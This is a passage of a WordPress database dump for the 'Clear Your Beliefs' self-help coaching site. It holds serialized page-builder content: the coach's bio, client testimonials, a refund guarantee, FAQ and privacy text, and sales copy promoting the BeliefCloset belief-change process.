singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<div style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We’ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\n// ]]></script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:2:"25";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1629, 2057, 'panels_data', 'a:3:{s:7:"widgets";a:26:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:16:"Ok I''m convinced";s:4:"text";s:238:"<center><a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:529:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>\n\n<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"13";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:14;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"14";s:5:"class";s:14:"WP_Widget_Text";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"<div class="parg-title"><h1>Upgrade Your Human Operating System</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:306:"<div class="parg-text"><p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:224:"<div class="parg-text"><p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:4:{s:5:"title";s:0:"";s:4:"text";s:796:"<div class="icon_box bullets">\n<ul class="two-col">\n<li><strong><em>I’m not enough.</em></strong></li>\n<li><strong><em>I can’t do it.</em></strong></li>\n<li><strong><em>I’m not worthy.</em></strong></li>\n<li><strong><strong><em>I’ll never be like them.</em></strong></strong></li>\n<li><strong><em>I’m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n<li><strong><em>There’s something wrong with me.</em></strong></li>\n<li><strong><em>I’m fundamentally flawed.</em></strong></li>\n<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"21";s:5:"class";s:14:"WP_Widget_Text";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:212:"<div class="parg-text"><p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"17";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}i:23;a:4:{s:5:"title";s:0:"";s:4:"text";s:231:"<div class="parg-text"><p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"18";s:4:"cell";s:1:"0";s:2:"id";s:2:"23";s:5:"class";s:14:"WP_Widget_Text";}}i:24;a:4:{s:5:"title";s:0:"";s:4:"text";s:230:"<div class="parg-text"><p><strong>Here’s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"19";s:4:"cell";s:1:"0";s:2:"id";s:2:"24";s:5:"class";s:14:"WP_Widget_Text";}}i:25;a:4:{s:5:"title";s:0:"";s:4:"text";s:70890:"<div class="quot" style="float: left; margin-top: 0px; margin-left: 70px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n&nbsp;\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n&nbsp;\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	